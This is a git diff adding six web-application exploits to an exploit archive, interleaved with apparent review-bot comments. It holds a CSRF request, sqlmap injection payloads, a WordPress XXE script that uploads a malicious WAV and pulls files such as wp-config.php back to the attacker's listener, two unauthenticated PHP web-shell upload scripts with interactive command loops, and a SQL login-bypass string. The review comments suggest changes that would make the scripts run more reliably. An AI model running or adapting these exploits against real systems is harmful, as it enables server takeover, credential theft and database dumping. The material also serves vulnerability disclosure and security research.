diff --git a/exploits/multiple/webapps/50302.txt b/exploits/multiple/webapps/50302.txt new file mode 100644 index 000000000..c7daf3fca --- /dev/null +++ b/exploits/multiple/webapps/50302.txt @@ -0,0 +1,74 @@ +# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) +# Exploit Author: Alperen Ergel +# Software Homepage: https://www.tsoft.com.tr/ +# Version : v4 +# Tested on: Kali Linux (2021.4) / xammp +# Category: WebApp +# Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'" +# Date: 2021-08-15 +######## Description ######## +# +# Attacker can change admin informaiton +# +# +######## Proof of Concept ######## + +POST /srv/service/admin/updateuserinfo HTTP/1.1 + +Host: localhost + +Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded + +X-Requested-With: XMLHttpRequest + +Content-Length: 74 + +Origin: http://localhost + +Referer: http://localhost/Y/ + +Te: trailers + +Connection: close + + + +firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595 + + + + +####### EXPLOIT ################## + + + + + + +
+ + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/50303.txt b/exploits/php/webapps/50303.txt new file mode 100644 index 000000000..641a3d56b --- /dev/null +++ b/exploits/php/webapps/50303.txt 
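Review bot: The proof-of-concept request carries `X-Requested-With: XMLHttpRequest`, and the advisory never says whether `/srv/service/admin/updateuserinfo` accepts the update without that header; a plain cross-origin HTML form cannot set it, so the CSRF claim in the title rests on an unstated assumption that should be spelled out, e.g. `# Note: the endpoint does not require the X-Requested-With header` if that was verified. The title speaks of changing admin credentials, but the body only submits firstName, lastName, email and phone. The live-looking `PHPSESSID` and `TSOFT_LOGGED` values in the Cookie line should be replaced with placeholders before publication. The `####### EXPLOIT` section appears empty as rendered here, possibly stripped during extraction, so whatever was meant to follow is not captured.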
@@ -0,0 +1,43 @@ +# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) +# Exploit Author: Erwin Krazek (Nero) +# Date: 17/09/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip +# Vendor: oretnom23 +# Version: v1.0 +# Tested on: Linux, Apache, Mysql +# Exploit Description: +Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack. + +# Vulnerable Code +In search.php on line 28 +$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows; + +Sqlmap command: +sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch + +Output: +--- +Parameter: search (GET) +Type: boolean-based blind +Title: OR boolean-based blind - WHERE or HAVING clause (NOT) +Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu + +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac + +Type: UNION query +Title: Generic UNION query (NULL) - 14 columns +Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- - +--- +[17:33:38] [INFO] the back-end DBMS is MySQL +web server operating system: Linux 
Debian +web application technology: Apache 2.4.46, PHP +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) +[17:33:38] [INFO] fetching database names +available databases [4]: +[*] church_db +[*] information_schema +[*] mysql +[*] performance_schema \ No newline at end of file diff --git a/exploits/php/webapps/50304.sh b/exploits/php/webapps/50304.sh new file mode 100755 index 000000000..ad2671a0c --- /dev/null +++ b/exploits/php/webapps/50304.sh 
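Review bot: The `# Vulnerable Code` line shows `$_GET['search']` interpolated straight into the query, but the advisory stops at demonstrating the injection and gives no remediation; a line such as `# Fix: bind the search term as a prepared-statement parameter ('%term%') instead of interpolating it into the query` would make the entry useful to the vendor's users. The date `17/09/2021` uses a different format from the ISO dates in the neighbouring entries. The sqlmap listing that follows names four databases, three of which are MySQL system schemas, and adds nothing to the finding beyond the detection lines.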
@@ -0,0 +1,175 @@ +# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) +# Date: 16/09/2021 +# Exploit Author: David Utón (M3n0sD0n4ld) +# Vendor Homepage: https://wordpress.com +# Affected Version: WordPress 5.6-5.7 & PHP8 +# Tested on: Linux Ubuntu 18.04.5 LTS +# CVE : CVE-2021-29447 + +#!/bin/bash + +# Author: @David_Uton (m3n0sd0n4ld) +# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST +# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX + + +# Variables +rHost=$1 +username=$2 +password=$3 +readFile=$4 +lHost=$5 + +# Functions +# Logotype +logoType(){ + echo " +===================================== +CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated) +------------------------------------- +@David_Uton (M3n0sD0n4ld) +https://m3n0sd0n4ld.github.io/ +=====================================" +} + +# Create wav malicious +wavCreate(){ + echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav" +} + +# Create xx3.dtd +dtdCreate(){ +cat < xx3.dtd + +" > +EOT +} + +# wav upload +wavUpload(){ +cat < .upload.py +#/usr/bin/env python3 + +import requests, re, sys + +postData = { + 'log':"$username", + 'pwd':"$password", + 'wp-submit':'Log In', + 'redirect_to':'http://$rHost/wp-admin/', + 'testcookie':1 +} + +r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True + +cookies = r.cookies + +print("[+] Getting Wp Nonce ... ") + +res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies) +wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) + +if len(wp_nonce_list) == 0 : + print("[-] Failed to retrieve the _wpnonce") + exit(0) +else : + wp_nonce = wp_nonce_list[0] + print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce) + +print("[+] Uploading the wav file ... 
") + +postData = { + 'name': 'payload.wav', + 'action': 'upload-attachment', + '_wpnonce': wp_nonce +} + +wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))} +r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies) +if r_upload.status_code == 200: + image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] + _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] + print('[+] Wav uploaded successfully') +else : + print("[-] Failed to receive a response for uploaded! Try again . \n") + exit(0) +EOT +python3 .upload.py +} + +# Server Sniffer +serverSniffer(){ + statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid) +} + +# Load file and decoder +loadFile(){ + content="http.server.log" + wavUpload + + while : + do + if [[ -s $content ]]; then + echo "[+] Obtaining file information..." + sleep 5s # Increase time if the server is slow + + base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u) + + # Check file exists + echo "" > decode.php + sizeCheck=$(wc -c decode.php | awk '{printf $1}') + if [[ $sizeCheck -gt "46" ]]; then + php decode.php + else + echo "[!] File does not exist or is not allowed to be read." + fi + break + fi + done +} + +# Cleanup +cleanup(){ + kill $(cat http.server.pid) &>/dev/null + rm http.server.log http.server.pid &>/dev/null + rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null +} + + +# Execute +logoType + +# Checking parameters +if [[ $# -ne 5 ]];then + echo "[!] Parameters are missing!!!" + echo "" + echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST" +else + + # Test Connection... + echo "[*] Test connection to WordPress..." 
+ + # WP Auth + authCheck=$(curl -i -s -k -X $'POST' \ + -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'wordpress_test_cookie=WP%20Cookie%20check' \ + --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \ +"http://$rHost/wp-login.php" > .cookies.tmp) + + auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }') + + # Running authentication with WordPress. + + if [[ $auth != "302" ]]; then + echo "[-] Authentication failed ! Check username and password" + else + echo "[+] Authentication successfull!!!" + + # Create wav & dtd file + wavCreate + dtdCreate + serverSniffer + loadFile + cleanup + fi +fi \ No newline at end of file diff --git a/exploits/php/webapps/50305.py b/exploits/php/webapps/50305.py new file mode 100755 index 000000000..61bbd4996 --- /dev/null +++ b/exploits/php/webapps/50305.py 
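Review bot: The `#!/bin/bash` line comes after eight comment lines, so it is not a shebang; the file is added with mode 100755 and relies on bash-only constructs (`[[ ]]`, `&>`, `$'...'`), so shells other than bash will fall back to /bin/sh for `./50304.sh` and fail on those lines. Move `#!/bin/bash` to line 1 and keep the header comments below it. Separately, `cleanup` is only reached on the success path, so an interrupt during the `loadFile` wait loop leaves the background `http.server` process and its pid/log files behind; `trap cleanup EXIT` placed after the function definitions would cover that. `lHost` (`$5`) is counted by the argument check but, as rendered here, never referenced; the dtd heredoc looks truncated in this rendering, so that may be where it was used.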
@@ -0,0 +1,182 @@ +# Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: 2021-09-20 +# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip +# Version: 2.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + +# Exploit Details: + +# 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session. +# 2. Set the 'action' parameter of the POST request to 'save_settings'. +# - `ajax.php?action=save_settings` +# 3. Capture request in burp and replace with with following request. 
+ +''' +POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251 +Content-Length: 754 +Origin: http://localhost +Connection: close +Referer: http://localhost/fos/admin/index.php?page=site_settings +Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="name" + +adsa +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="email" + +asdsad@asda.com +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="contact" + +asdsad +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="about" + +asdsad +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="img"; filename="phpinfo.php" +Content-Type: application/octet-stream + + +-----------------------------120025571041714278883588636251-- +''' +# ` Image uploader is renaming your payload using the following function. + # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; + # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler + # and print this function to get the value. e.g: Output: 1632085200 + # concate output with your playload name like this 1632085200_phpinfo.php +# 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests. 
+ +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + + + + + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Online Food Ordering System v2.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + ______ _______ ________ + ___ //_/__ /_______ ___ _______ ______(_)_____ _ + __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ + _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / + /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ + /___/ + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + +#Create a new session +s = requests.Session() + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'/assets/img/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] 
"+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data) + +shell_upload = True if("1" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + + + +#Executing The Webshell +webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50306.py b/exploits/php/webapps/50306.py new file mode 100755 index 000000000..b40358cd0 --- /dev/null +++ b/exploits/php/webapps/50306.py 
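Review bot: After the upload check prints `[-]Failed To Upload The PHP Shell!`, execution falls through to `webshell(LINK, s)` anyway, so a failed upload is reported and then followed by a misleading "Could not connect to the webshell" path; the `else:` branch should end with `sys.exit(1)`. Inside `webshell`, the bare `except:` swallows every exception, including the `HTTPError` raised by `raise_for_status()` and `KeyboardInterrupt`, and prints only "Exiting.", hiding the cause; narrow it, e.g. `except (requests.RequestException, KeyboardInterrupt, EOFError) as exc:` and print `exc`. `webshell` also reads the module-level `filename` that is assigned further down instead of taking it as a parameter, `shell_upload = True if ("1" in upload.text) else False` is just `"1" in upload.text`, and `urllib` and `Back` are imported but unused. The same issues are present in exploits/php/webapps/50306.py.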
@@ -0,0 +1,193 @@ +# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja +# Date: 2021-09-20 +# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip +# Version: 1.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + +# Exploit Details: + +# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session. +# 2. Set the 'f' parameter of the POST request to 'save'. +# - `Users.php?f=save` +# 3. Capture request in burp and replace with with following request. 
+''' +POST /church_management/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550 +Content-Length: 859 +Origin: http://localhost +Connection: close +Referer: http://localhost/church_management/admin/?page=user +Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="id" + +1 +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="firstname" + +Adminstrator +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="lastname" + +Admin +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="username" + +admin +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="password" + + +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="img"; filename="phpinfo.php" +Content-Type: application/octet-stream + + +-----------------------------91105564325608762312322546550-- + +''' +# ` Image uploader is renaming your payload using the following function. + # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; + # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler + # and print this function to get the value. e.g: Output: 1632085200 + # concate output with your playload name like this 1632085200_phpinfo.php +# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests. 
+ +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Church Management System v1.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + + + .----------. + .-''-. / / + . __ __ ___ .' .-. ) / ______.' + .'| | |/ `.' `. / .' / / / /_ + .' | | .-. .-. ' (_/ / / / '''--. +< | __ __ | | | | | | ,.----------. / / '___ `. + | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | + | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | + | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / + | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` + | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' + ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' +'------' '---'`--' `" `--' `" ( _.-' + + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults +#Create a new session +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + + +s = requests.Session() + + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'uploads/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] 
"+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) + +shell_upload = True if("Undefined index: id in" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + + + +#Executing The Webshell +webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50307.txt b/exploits/php/webapps/50307.txt new file mode 100644 index 000000000..8aedae48d --- /dev/null +++ b/exploits/php/webapps/50307.txt 
@@ -0,0 +1,19 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass +# Exploit Author: Prunier Charles-Yves +# Date: September 20, 2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip +# Tested on: Linux, windows +# Vendor: oretnom23 +# Version: v1.0 + +# Exploit Description: +Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application +allowing the attacker to login with admin acount + + +----- PoC: Authentication Bypass ----- + +Administration Panel: http://localhost/expense_budget/admin/login.php + +Username: admin' or ''=' -- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8791f8482..6b4e46cf0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
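Review bot: The advisory gives only the login URL and the credential string, and neither names the file or query that accepts it nor states a remediation, unlike 50303.txt in the same commit which quotes the vulnerable line; the payload indicates an SQL injection in the login query, so a `# Vulnerable Code` reference to the login handler and a `# Fix:` line recommending a parameterized query with a password-hash comparison would make the entry actionable. The title's "Authenticated Bypass" should read "Authentication Bypass" (the files_exploits.csv entry repeats the wording). The date "September 20, 2021" is a third date format in this commit alongside ISO and dd/mm/yyyy.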
@@ -44420,3 +44420,9 @@ id,file,description,date,author,type,platform,port 50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php, 50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php, 50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php, +50302,exploits/multiple/webapps/50302.txt,"T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,multiple, +50303,exploits/php/webapps/50303.txt,"Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)",1970-01-01,"Erwin Krazek",webapps,php, +50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php, +50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, +50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, +50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,